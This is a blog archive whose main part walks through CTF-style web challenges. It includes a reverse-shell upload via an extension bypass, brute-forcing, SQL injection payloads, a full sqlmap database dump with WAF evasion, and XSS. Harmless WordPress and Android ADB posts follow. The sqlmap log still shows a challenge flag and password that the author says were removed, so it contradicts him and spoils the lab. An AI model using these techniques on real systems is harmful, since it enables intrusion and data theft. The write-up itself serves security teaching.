Now we need to upload our reverse shell. But the website does not accept .php files. We still need the name to end in .php for the server to interpret the file as code and run it.

That’s why we try renaming it so that one of the supported extensions appears in the name, for example by letting it end in .png.php.

It uploads the file but we still have nothing in the terminal. We first have to get the server to execute our reverse shell. Sometimes you get lucky and the uploaded file is displayed right back to you, but that is not the case here.

So we need to find our reverse shell. It will be in some kind of upload directory on the server. We could use something like ffuf with a word list to find potential upload URLs, but in this case we can try to guess a few common ones, like upload.

We click our reverse shell there. The website will probably be stuck loading, but we get our shell back in the terminal.

With cat /var/www/flag.txt we can display the final flag.

Day 3 – Christmas Chaos

This day very much follows the guide already outlined in the challenge, so I will keep this brief.

After starting the attack box and deploying the challenge, we first have a look at the website. It is a typical login form.

We launch Burp Suite, set the Firefox proxy to Burp and turn intercept on in the Burp proxy. We put in some test credentials and send them. Burp intercepts the request and we can have a look at it.

In the HTTP history tab we can send the request to Burp Intruder. In the positions tab of Intruder we mark the positions; the two we need are the username and password values we had sent.

Then we move to the payloads tab and enter the word lists suggested by the challenge. Switch between the two positions with the payload set drop-down.

After clicking Start Attack and clicking away the community edition warning, we have a look at the results. Only one of them looks different from all the others.

We disable intercept and try that set of credentials to log in. In the control panel we find the flag.

Day 4 – Santa’s Watching

After starting the attack box and deploying the challenge we can view the defaced site.

To solve the second question, read the documentation above, it should tell you how to construct the required command.

Now we try to find the API endpoint of the forum with gobuster. As suggested we use -w to specify the dirbuster big word list. We add the .php extension with -x. This is not needed to solve the challenge; I just put it in there because most forum software is written in PHP and so were the previous challenges.

gobuster dir -u -w /usr/share/wordlists/dirb/big.txt -x .php

In gobuster’s output we find /api with an HTTP 301 code, a redirect. We pull the URL up in the browser.

It redirects to /api/, a directory on the server. It looks like the API only contains one endpoint, site-log.php.

The challenge tells us that the parameter for the endpoint is date. Usually we would have to find that out ourselves, either by fuzzing or by reading the documentation, if any is available for the software running.

So we fuzz it with wfuzz:

wfuzz -c -z file,/opt/AoC-2020/Day-4/wordlist -u

In the output we see that one of the results has a different length. So we pull up the URL with that parameter.

That will give us the flag and complete this day.
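Day 3 and Day 4 rely on the same idea: fire every candidate at the target and pick the one response that does not look like all the failures. Intruder and wfuzz do this for you, but it is worth seeing the logic stripped down. This is an added example, not from the room or the original post: a cluster-bomb iteration over two lists and a single-parameter fuzz, each run against a constructed mock instead of a live server, with the outlier chosen by its (status, length) signature. The "correct" credentials and the mock responses are invented for the demo; the date parameter is the one the Day 4 challenge names.

```python
import itertools
from collections import Counter


def run_attempts(candidates, send):
    """Send every candidate and keep its (status, length) signature, as Intruder and wfuzz do."""
    return {cand: send(*cand) for cand in candidates}


def outliers(results):
    """Candidates whose (status, length) signature occurs exactly once.
    Wrong guesses all produce the same page; the hit is the one that does not."""
    counts = Counter(results.values())
    return [cand for cand, sig in results.items() if counts[sig] == 1]


# Constructed mocks standing in for the Day 3 login form and the Day 4
# site-log.php endpoint; the winning values are invented for the demo.
def mock_login(user, pw):
    return (302, 0) if (user, pw) == ("admin", "12345") else (200, 1432)


def mock_site_log(param):
    return (200, 2048) if param == "date" else (200, 211)


USERS = ["admin", "root", "santa"]
PASSWORDS = ["password", "12345", "letmein"]
PARAMS = ["id", "date", "page", "user"]


def cluster_bomb(users=USERS, passwords=PASSWORDS, send=mock_login):
    """Day 3: every username with every password (Intruder's cluster bomb)."""
    return outliers(run_attempts(itertools.product(users, passwords), send))


def fuzz_param(params=PARAMS, send=mock_site_log):
    """Day 4: one request per candidate parameter name (wfuzz with a word list)."""
    return outliers(run_attempts([(p,) for p in params], send))


if __name__ == "__main__":
    print("login hit:", cluster_bomb())
    print("parameter hit:", fuzz_param())
```

Against a real target, send would be a function that performs the HTTP request and returns (response.status_code, len(response.content)); the rest stays the same. If more than one signature is unique, look at the responses by hand rather than trusting the length alone.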

Day 5 – Someone stole Santa’s gift list!

First we pull up the site in the browser.

I very much recommend that you play around a bit with the SQL injection training site also hosted on port 3000 if you are new to SQL injections.

Next we are supposed to guess the panel name. Trying a few things will hopefully lead you to santapanel.

Now we can use an SQL injection to bypass the login page. We use santa as the username and ' or true; -- as the password. The ' ends the string where the password is meant to be inserted. or true adds another condition to the SQL statement: it now asks whether the password matches or true holds, and since true always holds, the comparison with the password becomes irrelevant and we can log in as any existing user we specify. -- marks the rest of the original SQL query as a comment, so the server's own closing quote no longer breaks the syntax.

Our next task is to find out how many entries the gift table has and what Paul wants. We can use the same payload ' or true; -- again. This time it does not invalidate the password but the kid's name, so it returns the gift for every kid. Now it is just a matter of counting and finding Paul's gift.
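To make the two injections above concrete, here is an added example (not the room's code) in Python with an in-memory SQLite database: the vulnerable login and search build their SQL by pasting the input into the query text, the safe versions bind it as a parameter, and the same payload is run against both. The table contents are made up. The page's payload uses the bare keyword true, which MySQL and recent SQLite accept; the example uses 1=1, which every engine understands, and is otherwise identical.

```python
import sqlite3


# Constructed stand-in for the challenge's database; names and gifts are made up.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('santa', 'not-the-real-password');
        CREATE TABLE gifts(kid TEXT, gift TEXT);
        INSERT INTO gifts VALUES ('Paul', 'a sample gift'),
                                ('Anna', 'another gift'),
                                ('Tom', 'a third gift');
    """)
    return db


def login_vulnerable(db, username, password):
    """Input pasted into the SQL text: the shape of query the payload exploits."""
    query = f"SELECT 1 FROM users WHERE username = '{username}' AND password = '{password}'"
    return db.execute(query).fetchone() is not None


def login_safe(db, username, password):
    """Same query with bound parameters; the quote in the payload is just data now."""
    query = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return db.execute(query, (username, password)).fetchone() is not None


def search_vulnerable(db, kid):
    """The santapanel search: kid name pasted into the WHERE clause."""
    return db.execute(f"SELECT kid, gift FROM gifts WHERE kid = '{kid}'").fetchall()


def search_safe(db, kid):
    return db.execute("SELECT kid, gift FROM gifts WHERE kid = ?", (kid,)).fetchall()


# The post's payload with 1=1 in place of true. After substitution the vulnerable
# login reads: ... AND password = '' or 1=1; -- '
PAYLOAD = "' or 1=1; -- "


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login:", login_vulnerable(db, "santa", PAYLOAD))
    print("safe login:     ", login_safe(db, "santa", PAYLOAD))
    print("vulnerable search:", search_vulnerable(db, PAYLOAD))
    print("safe search:      ", search_safe(db, PAYLOAD))
```

AND binds tighter than OR, so the vulnerable login evaluates (username = 'santa' AND password = '') OR 1=1 and returns a row no matter what; the bound version searches for a user whose password is literally ' or 1=1; -- and finds none.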

The screenshot is intentionally cropped to not reveal the answers. What we can see is that the search term is transmitted in the URL as a GET parameter. This makes using a tool like sqlmap rather easy. So instead of manually dumping the database to look for the flag and the admin password, we use sqlmap.

First we start up Burp and switch the proxy in the browser to Burp. Then we reload the panel with a default search, like shoes. We send the request from the Burp proxy to Intruder, where we can save it to disk. This allows us to use the cookie of our session etc. with sqlmap.

sqlmap -r gift --dump-all --tamper=space2comment

-r gift points sqlmap to the file saved from Burp. I named mine gift but you might have chosen a different name.

--dump-all asks it to dump all data it can find.

--tamper=space2comment is a simple WAF-evasion technique (spaces in the payloads are replaced with inline /**/ comments), something hinted at in the challenge. If you forget it, sqlmap will suggest it too.

While it is running, sqlmap will prompt you for input. See the full dump below for details.

root@ip-10-10-172-235:~# sqlmap -r gift --dump-all --tamper=space2comment
 ___ ___[(]_____ ___ ___  {1.2.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:09:08

[02:09:08] [INFO] parsing HTTP request from 'gift'
[02:09:08] [INFO] loading tamper script 'space2comment'
[02:09:08] [INFO] testing connection to the target URL
[02:09:08] [INFO] testing if the target URL content is stable
[02:09:09] [INFO] target URL content is stable
[02:09:09] [INFO] testing if GET parameter 'search' is dynamic
[02:09:09] [INFO] confirming that GET parameter 'search' is dynamic
[02:09:09] [INFO] GET parameter 'search' is dynamic
[02:09:09] [WARNING] heuristic (basic) test shows that GET parameter 'search' might not be injectable
[02:09:09] [INFO] testing for SQL injection on GET parameter 'search'
[02:09:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:09:09] [WARNING] reflective value(s) found and filtering out
[02:09:09] [INFO] GET parameter 'search' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="James")
[02:09:09] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[02:09:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[02:09:28] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[02:09:28] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[02:09:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:09:28] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[02:09:28] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:09:28] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[02:09:28] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[02:09:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[02:09:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[02:09:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[02:09:28] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[02:09:28] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[02:09:28] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[02:09:28] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[02:09:28] [INFO] testing 'MySQL inline queries'
[02:09:28] [INFO] testing 'PostgreSQL inline queries'
[02:09:28] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[02:09:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[02:09:28] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:09:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[02:09:28] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[02:09:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[02:09:28] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[02:09:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[02:09:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[02:09:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[02:09:28] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[02:09:28] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[02:09:28] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)'
[02:09:28] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[02:09:28] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[02:09:29] [INFO] testing 'MySQL AND time-based blind (ELT)'
[02:09:29] [INFO] testing 'MySQL OR time-based blind (ELT)'
[02:09:29] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[02:09:29] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[02:09:29] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[02:09:29] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[02:09:29] [INFO] testing 'Oracle AND time-based blind'
[02:09:29] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:09:29] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[02:09:29] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[02:09:29] [INFO] testing 'MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries)'
[02:09:29] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[02:09:29] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[02:09:29] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[02:09:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[02:09:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[02:09:29] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[02:09:29] [INFO] target URL appears to have 2 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[02:09:34] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
[02:09:34] [INFO] testing 'MySQL UNION query (39) - 1 to 20 columns'
[02:09:34] [INFO] testing 'MySQL UNION query (39) - 21 to 40 columns'
[02:09:35] [INFO] testing 'MySQL UNION query (39) - 41 to 60 columns'
[02:09:35] [INFO] testing 'MySQL UNION query (39) - 61 to 80 columns'
[02:09:36] [INFO] testing 'MySQL UNION query (39) - 81 to 100 columns'
[02:09:36] [INFO] checking if the injection point on GET parameter 'search' is a false positive
[02:09:36] [INFO] heuristics detected web page charset 'ascii'
[02:09:36] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 195 HTTP(s) requests:
Parameter: search (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: search=shoes%' AND 1839=1839 AND '%'='
[02:09:43] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[02:09:43] [INFO] testing MySQL
[02:09:43] [WARNING] the back-end DBMS is not MySQL
[02:09:43] [INFO] testing Oracle
[02:09:43] [WARNING] the back-end DBMS is not Oracle
[02:09:43] [INFO] testing PostgreSQL
[02:09:43] [WARNING] the back-end DBMS is not PostgreSQL
[02:09:43] [INFO] testing Microsoft SQL Server
[02:09:43] [WARNING] the back-end DBMS is not Microsoft SQL Server
[02:09:43] [INFO] testing SQLite
[02:09:43] [INFO] confirming SQLite
[02:09:43] [INFO] actively fingerprinting SQLite
[02:09:43] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[02:09:43] [INFO] sqlmap will dump entries of all tables from all databases now
[02:09:43] [INFO] fetching tables for database: 'SQLite_masterdb'
[02:09:43] [INFO] fetching number of tables for database 'SQLite_masterdb'
[02:09:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:09:43] [INFO] retrieved: 3
[02:09:43] [INFO] retrieved: users
[02:09:44] [INFO] retrieved: sequels
[02:09:45] [INFO] retrieved: hidden_table
[02:09:46] [INFO] retrieved: CREATE TABLE sequels (title text, kid text, age integer)
[02:09:54] [INFO] fetching entries for table 'sequels' in database 'SQLite_masterdb'
[02:09:54] [INFO] fetching number of entries for table 'sequels' in database 'SQLite_masterdb'
[02:09:54] [INFO] retrieved: 22
Database: SQLite_masterdb
Table: sequels
[22 entries]
| kid  | age  | title |

[02:09:54] [INFO] table 'SQLite_masterdb.sequels' dumped to CSV file '/root/.sqlmap/output/'
[02:09:54] [INFO] retrieved: CREATE TABLE hidden_table (flag text)
[02:10:00] [INFO] fetching entries for table 'hidden_table' in database 'SQLite_masterdb'
[02:10:00] [INFO] fetching number of entries for table 'hidden_table' in database 'SQLite_masterdb'
[02:10:00] [INFO] retrieved: 1
[02:10:00] [INFO] retrieved: thmfox{All_I_Want_for_Christmas_Is_You}
Database: SQLite_masterdb
Table: hidden_table
[1 entry]
| flag                                    |
| Here will be the flag                   |

[02:10:05] [INFO] table 'SQLite_masterdb.hidden_table' dumped to CSV file '/root/.sqlmap/output/'
[02:10:05] [INFO] retrieved: CREATE TABLE users (username text, password text)
[02:10:09] [INFO] fetching entries for table 'users' in database 'SQLite_masterdb'
[02:10:09] [INFO] fetching number of entries for table 'users' in database 'SQLite_masterdb'
[02:10:09] [INFO] retrieved: 1
[02:10:09] [INFO] retrieved: EhCNSWzzFP6sc7gB
[02:10:10] [INFO] retrieved: admin
Database: SQLite_masterdb
Table: users
[1 entry]
| username | password         |
| admin    | here password    |

[02:10:10] [INFO] table 'SQLite_masterdb.users' dumped to CSV file '/root/.sqlmap/output/'
[02:10:10] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 1 times
[02:10:10] [INFO] fetched data logged to text files under '/root/.sqlmap/output/'

[*] shutting down at 02:10:10

In the dump you find the flag and the password, but I removed them, of course.

Day 6 – Be careful what you wish on a Christmas night

Again we launch both boxes and pull the website up in the browser.

First we get a bit of a feeling for the app by adding a few items and using the search.

Then we try a basic XSS payload, <script>alert('1')</script>, in the input fields. In the search field it already triggers: the search term is reflected back into the page unencoded.

In the URL bar we can see the search parameter carrying the payload.

The same payload can be entered in the new-book field. This results in stored cross-site scripting: the payload is saved with the book and the popup comes up every time the page is reloaded.
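The two findings differ only in where the payload lives, not in the root cause: the application writes user input into HTML without encoding it. The following Python model is an added example, not the challenge's code: a constructed in-memory bookstore with a reflected search box and a stored book list, rendered once without and once with output encoding.

```python
import html

# Constructed model of the two sinks the post exercises: a search box whose
# term is echoed back (reflected XSS) and a "new book" field whose value is
# saved and shown on every page load (stored XSS).
PAYLOAD = "<script>alert('1')</script>"


class Bookstore:
    def __init__(self):
        self.books = []

    def add_book(self, title):
        # Store the title as typed. Encoding belongs at output time: data
        # encoded on input is wrong for every consumer that is not HTML
        # (JSON APIs, CSV exports, log lines) and is easy to double-encode.
        self.books.append(title)

    def render_vulnerable(self, search=""):
        # Plain string formatting: whatever the user typed is emitted as markup.
        items = "".join(f"<li>{b}</li>" for b in self.books)
        return f"<p>Results for: {search}</p><ul>{items}</ul>"

    def render_safe(self, search=""):
        # html.escape(quote=True) turns < > & " ' into entities, which is the
        # right encoder for an HTML text context. Values placed into an
        # attribute, a URL or a <script> block need a context-specific encoder.
        items = "".join(f"<li>{html.escape(b, quote=True)}</li>" for b in self.books)
        return f"<p>Results for: {html.escape(search, quote=True)}</p><ul>{items}</ul>"


def script_survives(page):
    """Crude check used by this demo: did a raw <script> tag reach the page?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    store = Bookstore()
    print("reflected, vulnerable:", script_survives(store.render_vulnerable(PAYLOAD)))
    print("reflected, safe:      ", script_survives(store.render_safe(PAYLOAD)))
    store.add_book(PAYLOAD)  # the stored variant: fires on every later load
    print("stored, vulnerable:   ", script_survives(store.render_vulnerable()))
    print("stored, safe:         ", script_survives(store.render_safe()))
```

The stored variant is the more dangerous one in practice: it fires for every visitor of the book list, not only for whoever clicks a crafted search URL.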

For the next part we launch OWASP ZAP and give it a moment to update after it starts. Then we start an automated scan of our target.

ZAP essentially finds the two vulnerabilities we already discussed above.

Reload the site again and have a look at what ZAP added to the list. Its testing is quite verbose.

Excluding a Category from WordPress main page & RSS feed (quick & dirty)

I recently started a daily writing practice. Using the existing blog seemed to be the fastest way to publish, but I did not want those posts in the main blog listing and the RSS feed.

You can find the posts in the Notebook category. By default, WordPress does not let you exclude a category like that, though.

Ultimate Category Excluder

The Ultimate Category Excluder (what a name) plugin lets you hide a category from the latest blog posts as well as from the RSS feeds. It is rather simple to configure and does what it says it does.

It does however hide the category from all RSS feeds. I wanted to keep a feed for the category, so people interested in following the notebook could subscribe. It also allows for syndication, like in Rixx's notebook collection.

Quick & Dirty fix

My goal was to set this up quickly, and I was already considering just running Hugo or another static site generator. That would have taken quite a bit of time to set up properly as well, though.

But then I found a post on the plugin's support forums that describes a quick & dirty fix. In /plugins/ultimate-category-excluder/ultimate-category-excluder.php, line 204 (it was line 152 and later 157 in older versions; EDIT: the line changed to 204 with the current version), change

if ( $query->is_feed ) {

to

if ( $query->is_feed && !$query->is_archive ) {

so the exclusion is skipped for category feeds, which WordPress treats as archive queries. It works, and from a quick glance at the rest of the plugin's code it should not have further side effects.

That change still comes with one drawback: I have to redo it every time the plugin is updated, and I can not rely on the integrity check for the plugin file, since it always comes up as changed.

This can only be a short term solution and I would not recommend it for the use in customer projects. I hope excluding a category only from the main feed will be added as a feature to the plugin, but if it does not, I will eventually have to write my own solution.

Uninstalling Preinstalled Android Apps without root

On my Moto G6 every update seems to re-enable the Outlook and LinkedIn apps I disabled on purpose. Apps preinstalled by the manufacturer cannot be uninstalled via the Play Store or the app settings, only disabled.

So far I have been disabling them after each update, but I have gotten quite annoyed by it and did a little research to find out how to fully uninstall them.


What you need is the Android Debug Bridge (ADB) on your computer, and you need to enable USB debugging on the phone.

I have used Windows in this guide, but there is a great guide on how to set everything up on Windows, Mac & Linux over at XDA-Developers that walks you through the process.

USB Debugging on the Phone

If you haven't enabled Developer mode on your phone yet, navigate to Settings, then System -> About and scroll down to the build number. Tap it 7 times to enable Developer mode.

You will then find the Developer options in the System settings menu. Go there and enable USB debugging.

ADB on Windows

Setting up ADB on Windows is straightforward. Download the latest ADB version (it ships with the Android SDK platform-tools), extract the files from the zip and navigate in PowerShell to the extracted folder.

Tip: you can hold down SHIFT when right-clicking in Explorer and use "Open PowerShell window here".

From here you can run the adb commands. Since we did not add the folder to the PATH, we have to prefix the command with .\ so that PowerShell uses the adb.exe in this folder.

If you follow this guide on a different OS or have ADB in your PATH you don’t have to use the .\

Connecting the Phone

Connect the phone via USB and double check that USB debugging is enabled.

Then you check for connected devices

.\adb devices                                  

This starts the ADB daemon and lists the connected devices:

* daemon not running; starting now at tcp:5037
* daemon started successfully
List of devices attached
ZY322XXXX      unauthorized

On your phone you should get a pop-up asking you to allow USB debugging from this computer, showing the computer's RSA key fingerprint. Only accept it for a computer you plugged the phone into yourself: an accepted computer gets a shell on the device. After accepting it,

.\adb devices

should list your device without the unauthorized marker:

List of devices attached
ZY322XXXX      device

Listing the Apps

.\adb shell pm list packages

Prints out a long list of all installed packages. Use this list to find the full package name of the apps you want to uninstall.


While you can uninstall most apps like LinkedIn and Outlook, you should be more careful with system apps: removing a package that other system components depend on can leave the phone in an unusable state.

Uninstalling the App

.\adb shell pm uninstall --user 0 [Package Name]

Will uninstall the app. So in my case I just had to issue

.\adb shell pm uninstall --user 0


.\adb shell pm uninstall --user 0

Once ADB returns Success you can unplug your device and are done.

Remember to disable USB debugging again in the Developer options once you are done.
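Since the whole procedure has to be repeated after every update, it is worth scripting. The following Python script is an added example, not from the original post: it parses the output of adb devices (refusing to continue while the phone is still unauthorized), lists the installed packages, and uninstalls for user 0 only those on a fixed allowlist. The adb path and the two package names for Outlook and LinkedIn are assumptions, because the post does not show the exact names it removed.

```python
import re
import subprocess
import sys

# Assumptions: `adb` is on PATH (set ADB to the full path of adb.exe if you
# kept it in the extracted folder), and the two package names are guesses
# for the Outlook and LinkedIn apps.
ADB = "adb"
BLOAT = {
    "com.microsoft.office.outlook",
    "com.linkedin.android",
}


def adb(*args, runner=subprocess.run):
    """Run one adb command and return its stdout as text.
    `runner` is injectable so the logic can be exercised without a phone."""
    proc = runner([ADB, *args], capture_output=True, text=True, check=False)
    return proc.stdout


def parse_devices(output):
    """Turn `adb devices` output into {serial: state}. Daemon start-up
    messages and the 'List of devices attached' header are skipped."""
    devices = {}
    for line in output.splitlines():
        m = re.match(r"^(\S+)\s+(device|unauthorized|offline)$", line.strip())
        if m:
            devices[m.group(1)] = m.group(2)
    return devices


def parse_packages(output):
    """Turn `pm list packages` output (lines like package:com.foo) into a set."""
    return {
        line.split(":", 1)[1].strip()
        for line in output.splitlines()
        if line.startswith("package:")
    }


def plan_uninstalls(installed, bloat=BLOAT):
    """Only packages that are on the allowlist *and* currently installed are
    touched, so nothing outside BLOAT can ever be removed by accident."""
    return sorted(installed & bloat)


def remove_bloat(serial, runner=subprocess.run, dry_run=False):
    """Uninstall every planned package for user 0 on one device and return
    {package: result}, where result is 'Success' or the Failure[...] message
    that pm printed (or 'dry-run')."""
    listing = adb("-s", serial, "shell", "pm", "list", "packages", runner=runner)
    results = {}
    for pkg in plan_uninstalls(parse_packages(listing)):
        if dry_run:
            results[pkg] = "dry-run"
            continue
        out = adb("-s", serial, "shell", "pm", "uninstall", "--user", "0", pkg,
                  runner=runner)
        results[pkg] = out.strip()
    return results


def main(argv):
    dry_run = "--dry-run" in argv
    devices = parse_devices(adb("devices"))
    ready = [serial for serial, state in devices.items() if state == "device"]
    if not ready:
        print("no authorised device:", devices or "none attached", file=sys.stderr)
        print("accept the USB-debugging prompt on the phone and re-run", file=sys.stderr)
        return 1
    for serial in ready:
        for pkg, result in remove_bloat(serial, dry_run=dry_run).items():
            print(f"{serial} {pkg}: {result}")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv[1:]))
```

Run it with --dry-run first to see what would be removed. Keep in mind that pm uninstall --user 0 only removes the app for the primary user; the APK stays on the system partition, comes back after a factory reset, and on recent Android versions can be restored without a reset via adb shell cmd package install-existing <package>.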
